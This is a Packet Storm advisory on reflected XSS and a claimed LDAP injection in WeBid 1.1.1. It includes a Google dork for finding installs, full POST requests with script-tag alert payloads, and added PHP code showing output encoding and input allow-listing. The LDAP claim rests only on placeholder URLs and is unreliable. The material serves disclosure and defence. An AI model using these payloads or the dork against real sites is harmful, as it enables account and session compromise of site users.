WeBid 1.1.1 Cross Site Scripting / LDAP Injection

2014-07-10T00:00:00
ID PACKETSTORM:127431
Type packetstorm
Reporter Govind Singh
Modified 2014-07-10T00:00:00

Description

##################################################################################################  
#  
#Exploit Title : WeBid Version 1.1.1 multiple vulnerabilities   
#Author : Govind Singh aka NullPort  
#Vendor : http://www.webidsupport.com/  
#Download Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download  
#Google Dork : "Powered by WeBid"   
#Date : 11/07/2014  
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )  
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi  
#Greez to : All IHT Members   
#   
###################################################################################################  
  
1. Reflected Cross-Site Scripting :  
2. LDAP Injection  
  
1. http://localhost/WeBid/register.php  
  
Reflected Cross-Site Scripting is present in the following parameters:  
"TPL_name"   
"TPL_nick"   
"TPL_email"   
"TPL_year"   
"TPL_address"   
"TPL_city"   
"TPL_prov"   
"TPL_zip"   
"TPL_phone"   
"TPL_pp_email"   
"TPL_authnet_id"   
"TPL_authnet_pass"   
"TPL_worldpay_id"   
"TPL_toocheckout_id"   
"TPL_moneybookers_email"  
  
PoC:  
The same XSS payload can be submitted in any of these parameters; the captured request below uses TPL_name.   
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/web-id/register.php  
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=417  
POSTDATA=csrftoken=&TPL_name="><script>alert('Hacked By Govind Singh aka NullPort');</script>&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first  
----------------------------------------------------------------------------------------------------------------  
2. http://localhost/WeBid/user_login.php  
  
Reflected Cross-Site Scripting is present in the parameter:  
"username"   
  
Host=localhost  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate  
Referer=http://localhost/web-id/user_login.php  
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=96  
POSTDATA=username="><script>alert('xss PoC By Govind Singh');</script>&password=&input=Login&action=login  
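The bug class behind the register.php and user_login.php findings, shown as an added illustration that is not WeBid's own code: a form field that re-populates its value from the previous POST, first written into the page unescaped and then with attribute-context encoding. The function names and the sample input are assumptions; the payload is the shape used in the PoC requests above.

```php
<?php
// Added illustration, not WeBid's code: a registration form that echoes the
// submitted TPL_name back into its own value="" attribute.

// Constructed sample input standing in for $_POST['TPL_name'] in the PoC.
$input = '"><script>alert(1);</script>';

// Vulnerable pattern: the raw value is concatenated into the attribute.
// The leading double quote closes the attribute, the '>' closes the tag,
// and the <script> element that follows is parsed and executed by the browser.
function render_name_field_vulnerable(string $name): string
{
    return '<input type="text" name="TPL_name" value="' . $name . '">';
}

// Hardened pattern: encode for the HTML attribute context before output.
// ENT_QUOTES encodes both " and ' so neither can terminate the attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string,
// and the explicit charset keeps multi-byte input from being mis-encoded.
function render_name_field_hardened(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="TPL_name" value="' . $safe . '">';
}

echo render_name_field_vulnerable($input), PHP_EOL;
echo render_name_field_hardened($input), PHP_EOL;
```

With the hardened function the quote, angle brackets and slash in the input are emitted as `&quot;`, `&lt;`, `&gt;` entities, so the browser renders the payload as literal text inside the field instead of as markup. The same encoding step applies to every parameter in the list above and to `username` on user_login.php; a reflected value is safe only if it is encoded for the exact context (attribute, element body, JavaScript string) it is written into.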
==================================================================================================================  
2. LDAP Injection   
  
PoC:  
http://localhost/WeBid/loader.php?js=[LDAP]  
http://localhost/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;  
  
PoC:  
http://localhost/WeBid/viewhelp.php?cat=[LDAP]  
Replace cat= with 1, 2, 3 or 4.   
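A defensive pattern for the two GET parameters named in the PoC URLs above, added here as an illustration and not taken from WeBid's code: the semicolon-separated `js=` list is reduced to an allow-list of shipped script paths, and `cat=` is coerced to an integer and checked against known category ids. The allow-list contents, the category ids and the function names are assumptions; the sample requests are constructed from the PoC URLs.

```php
<?php
// Added illustration, not WeBid's code: allow-listing loader.php?js= and
// viewhelp.php?cat= instead of trusting whatever arrives in the query string.

// Assumed: only scripts that ship with the application may be served.
const ALLOWED_JS = [
    'js/jquery.js',
    'js/jquery.lightbox.js',
];

// Assumed: the help categories that actually exist (cat= 1..4 in the PoC).
const ALLOWED_HELP_CATS = [1, 2, 3, 4];

/**
 * Split the js= value on ';' and keep only allow-listed entries.
 * Anything else (traversal sequences, absolute paths, scanner markers such
 * as "[LDAP]") is dropped and returned separately so it can be logged.
 */
function filter_js_list(string $js): array
{
    $accepted = [];
    $rejected = [];
    foreach (explode(';', $js) as $entry) {
        $entry = trim($entry);
        if ($entry === '') {
            continue; // the trailing ';' in the PoC yields an empty element
        }
        if (in_array($entry, ALLOWED_JS, true)) {
            $accepted[] = $entry;
        } else {
            $rejected[] = $entry;
        }
    }
    return ['accepted' => $accepted, 'rejected' => $rejected];
}

/**
 * Accept cat= only as a short decimal integer that names a known category.
 * Returns null for anything else; the caller should answer with 400 or 404.
 */
function validate_help_cat(string $cat): ?int
{
    if (!preg_match('/^\d{1,4}$/', $cat)) {
        return null;
    }
    $id = (int) $cat;
    return in_array($id, ALLOWED_HELP_CATS, true) ? $id : null;
}

// Constructed requests mirroring the PoC URLs.
$good = filter_js_list('js/jquery.js;js/jquery.lightbox.js;');
printf("js accepted: %s\n", implode(', ', $good['accepted']));

$bad = filter_js_list('[LDAP]');
foreach ($bad['rejected'] as $entry) {
    // Rejected entries are worth logging: they are a cheap detection signal
    // for probing of the loader endpoint.
    error_log('loader.php rejected js entry: ' . $entry);
}

var_dump(validate_help_cat('2'));
var_dump(validate_help_cat('[LDAP]'));
```

The point of both helpers is that the request value is never used to build a path, query or filter directly; it is matched against values the application already knows, and the rejected remainder is logged rather than silently ignored.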
  
----------------------------------------------------------------------------------------------------------------------  
  